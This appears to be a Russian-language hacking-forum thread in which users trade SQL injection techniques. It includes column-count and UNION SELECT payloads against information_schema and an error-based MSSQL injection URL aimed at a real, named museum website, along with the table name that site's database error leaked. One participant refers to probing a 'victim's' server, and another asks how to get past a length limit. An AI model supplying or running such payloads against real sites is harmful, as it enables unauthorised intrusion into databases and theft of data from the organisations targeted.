Pashkela
я не это спрашивал , извините за кривой вопрос.....


Jokester
пардон , я только "смотрел" )))))

Доброго времени суток всем.
Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так:
site.com/bla.php?id='5
Интересует именно конструкция запроса.
Заранее благодарен за ответ.

Запрос для чего ? Что нужно узнать то ? Какие данные вытащить ?..

Я думаю так, товарищ, начинайте не спеша отсюда:
https://forum.antichat.ru/thread104591.html

потом плавно переходите сюда:
https://forum.antichat.ru/threadnav43966-1-10.html

ну а в идеале не побрезгуйте и этим: (с 1 по 22 включительно)
http://www.sqlbook.ru/

удачи

Привет! Ребята такой вопрос изучаю сервак жервы и нашел /y_key_ec978e5d0cf6ceb1.html в

что это может бить?

Grookle, сотни раз уже писано-переписано
Подбор колонок: site.com/bla.php?id=5+order+by+1000/*
Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+informati on_schema.tables/*

Нечетное кол-во апострофов в результирующем запросе - потенциальная sqlinj

http://www.powerhousemuseum.com/designersatwork/how.php?ID=10+or+1=(select+top+1+table_name+from+i nformation_schema.tables)--+

mssql

почитай http://forum.antichat.ru/thread30501.html

Смотри внимательно, пишет:

Conversion failed when converting the nvarchar value 'Designers' to data type int.

Designers - это и есть табла.

ЗЫ: И пробел убери в ссылке.

Как эту расскрутить?Тут походу стоит ограничение на кол-во символов?!